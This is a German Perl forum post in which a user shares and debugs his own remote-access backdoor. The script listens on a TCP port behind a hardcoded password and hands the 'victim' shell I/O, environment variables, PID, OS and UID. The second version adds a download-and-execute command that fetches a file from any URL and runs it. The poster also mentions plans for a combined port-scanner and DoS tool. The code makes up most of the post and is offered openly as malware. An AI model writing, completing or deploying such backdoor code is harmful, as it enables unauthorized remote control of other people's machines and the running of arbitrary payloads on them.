Kleine Sprache parsen - #154079 (Allgemeines zu Perl)

KCobain

2011-11-09 19:41

User since
2011-10-03
34 Artikel
BenutzerIn
[default_avatar]

Sieht äußerst interessant aus. Mal sehen ob sicvh das einbauen läst. Habs momentan durch Split+RegEx gelöst. Kannste ja mal angucken.

Code (perl): (dl )

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

my $passwd='Test123';

$SIG{INT} = sub { print("Killed!"); exit(); };
$SIG{CHLD} = 'IGNORE';
our $skull = qq(_________#########
______###############
____###################
__#######################
_#########################
_##########################
############################
############################
############################
############################
####____#############___####
###____#____#####____#___###
#####__#____#####____#__####
#######___####__###___######
#############____###########
___##########____##########
____#########____#######
_____##################
____###_##_###_####_####
________HAPPY
____________HACKING!
____###_###_##_###_##_##
_____##################
______###############
_________##########
);

my $socket = new IO::Socket::INET(
        LocalHost => "localhost",
        LocalPort => 9999,
        Proto     => 'tcp',
        Listen    => SOMAXCONN,
        Reuse     => 1
) || die("Kann den Socket nicht initiallisieren! $!");

while(1){
  my $new_socket = $socket->accept();
  print "Angreifer hat sich verbunden!\n";
  terminal($new_socket) if(fork()==0);
  close($new_socket);
}

close($socket);
exit();

sub terminal
{
  my $socket=shift;

  # Login erforderlich:
  my $pass_cnt = 10;
  while($pass_cnt)
  {
    print $socket "Password:\n";
    my $line=<$socket>;

    if($line=~/^\s*$passwd\s*$/s)
    {
      $pass_cnt=1;
      last();
    }
  }

  unless($pass_cnt)
  {
    print $socket "PASSWORD WRONG!\n";
    exit();
  }

  print "Angreifer hat sich eingeloggt!\n";

  # STDOUT STDERR STDIN umleiten
  open(my $out, ">&STDOUT") or exit();
  close(STDOUT) or exit();
  close(STDERR) or exit();
  close(STDIN)  or exit();
  *STDOUT=\*$socket;
  *STDERR=\*$socket;
  *STDIN=\*$socket;

  print "Login OK\n";
        print $skull;
  my $buffer='';

  while(my $line=<$socket>)
  {
    $line=~y/\x0D//d;
    $line=~s/\x0A+$//s;
                my @funcarr;
                if($line =~ /^exit/){
                        print "Schließe Verbindung...\n";
                        close($socket);
                        last();
                }
                elsif($line =~ /^get/){
                        if($line =~ /^get$/){
                                print "get braucht einen parameter\n";
                        }
                        else{
                                @funcarr = split(/ /, $line);
                                print &get($funcarr[1]);
                        }
                }
                elsif($line =~ /^env$/){
                        foreach (keys(%ENV)) {
                                print "Key: $_ , Wert: $ENV{$_}\n";
                        }       
                }
                print $out "Angreifer hat die Verbindung beendet!\n";
        }
}
exit;
sub get() {
        my $opt = shift;
        if($opt =~ /^pid$/){
                return "Die Backdoor läuft mit der PID $$\n";
        }
        elsif($opt =~ /^os$/){
                return "Das Opfer hat das Betriebssystem '$^O'\n";
        }
        elsif($opt =~ /^uid$/){
                return "Der Nutzer hat die UID $<\n";
        }
        else {
                return "Parameter ist ungültig\n";
        }
}
sub download(){
        my $url = shift;

}

Ist aber noch nicht fertig. Bin noch dabei eine download &execute funktion einzubauen. Und mal sehen ob ichs noch hin bekomme mein DoS Script und mein PortScanner zu kombinieren um nen inteligenten DoS einzubauen. Nunja, man wird sehen was draus wird.

Im übrigen möchte ich mich nochmal bei euch allen für die nette Hilfe bedanken, was wäre ich blos ohne euch (Und die manpages und perldoc)

Edit: Habe nun folgenden neueren Code.

Code (perl): (dl )

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
use LWP;
use LWP::UserAgent;

my $passwd='Test123';

$SIG{INT} = sub { print("Killed!"); exit(); };
$SIG{CHLD} = 'IGNORE';
our $skull = qq(_________#########
______###############
____###################
__#######################
_#########################
_##########################
############################
############################
############################
############################
####____#############___####
###____#____#####____#___###
#####__#____#####____#__####
#######___####__###___######
#############____###########
___##########____##########
____#########____#######
_____##################
____###_##_###_####_####
________HAPPY
____________HACKING!
____###_###_##_###_##_##
_____##################
______###############
_________##########
);

my $socket = new IO::Socket::INET(
        LocalHost => "localhost",
        LocalPort => 9999,
        Proto     => 'tcp',
        Listen    => SOMAXCONN,
        Reuse     => 1
) || die("Kann den Socket nicht initiallisieren! $!");

while(1){
  my $new_socket = $socket->accept();
  print "Angreifer hat sich verbunden!\n";
  terminal($new_socket) if(fork()==0);
  close($new_socket);
}

close($socket);
exit();

sub terminal
{
  my $socket=shift;

  # Login erforderlich:
  my $pass_cnt = 10;
  while($pass_cnt)
  {
    print $socket "Password:\n";
    my $line=<$socket>;

    if($line=~/^\s*$passwd\s*$/s)
    {
      $pass_cnt=1;
      last();
    }
  }

  unless($pass_cnt)
  {
    print $socket "PASSWORD WRONG!\n";
    exit();
  }

  print "Angreifer hat sich eingeloggt!\n";

  # STDOUT STDERR STDIN umleiten
  open(my $out, ">&STDOUT") or exit();
  close(STDOUT) or exit();
  close(STDERR) or exit();
  close(STDIN)  or exit();
  *STDOUT=\*$socket;
  *STDERR=\*$socket;
  *STDIN=\*$socket;

  print "Login OK\n";
        print $skull;
  my $buffer='';

  while(my $line=<$socket>)
  {
    $line=~y/\x0D//d;
    $line=~s/\x0A+$//s;
                my @funcarr;
                if($line =~ /^exit/){
                        print "Schließe Verbindung...\n";
                        close($socket);
                        last();
                }
                elsif($line =~ /^get/){
                        if($line =~ /^get$/){
                                print "get braucht einen parameter\n";
                        }
                        else{
                                @funcarr = split(/ /, $line);
                                print &get($funcarr[1]);
                                @funcarr = ();
                        }
                }
                elsif($line =~ /^env$/){
                        foreach (keys(%ENV)) {
                                print "Key: $_ , Wert: $ENV{$_}\n";
                        }       
                }
                elsif($line =~ /^downaexe/){
                        my $param = split(/ /, $line); 
                        my $cont  = &wget($param);

                        my $Url         = $param;
                        my $Stop = index($Url,":");
                        my $Protokoll = substr($Url,0,$Stop);
                        my $Start = index($Url,"//") + 2;
                        my $Domain = substr($Url,$Start);
                        $Stop = index($Domain,"/");
                        $Domain = substr($Domain,0,$Stop);
                        $Start = rindex($Url,"/") + 1;
                        my $Dateiname = substr($Url,$Start);
                        open(my $fh, ">$Dateiname");
                        print $fh $cont;
                        close($fh);
                        print `./$Dateiname` or `start ./$Dateiname`;
                }
                print $out "Angreifer hat die Verbindung beendet!\n";
        }
}

sub get() {
        my $opt = shift;
        if($opt =~ /^pid$/){
                return "Die Backdoor läuft mit der PID $$\n";
        }
        elsif($opt =~ /^os$/){
                return "Das Opfer hat das Betriebssystem '$^O'\n";
        }
        elsif($opt =~ /^uid$/){
                return "Der Nutzer hat die UID $<\n";
        }
        else {
                return "Parameter ist ungültig\n";
        }
}


sub wget(){                                   
        my $url = shift;
        my $agent = LWP::UserAgent->new();              # new obj
        my $ret;                                        # content
        my $resp;                                       # Call
        $agent->agent("PerlBackdoor/1.1 Beta");
        $resp  = $agent->get($url);             
        $ret = $resp->decoded_content();                                                                          # Decode content
        return $ret;                                                                                              # and return
}







exit;

Jetzt wird wenn ich http://127.0.0.1/test.sh downloaden möchte eine Dtaei mit den namen 2 Angelegt mit dme Inhalt "400 URL must be absolute"
Erkennt jemand von euch den Fehler?

EDIT2:
Lag daran das ich statt nen Array nen Skalar beim split genommen habe *kopf-meets-tischplatte* Und vergessen chmod zu setzten.- Muss ich das auf windoof auch machen? oder kann ich da ne runtergeladene datei einfach starten?.
Last edited: 2011-11-09 20:56:11 +0100 (CET)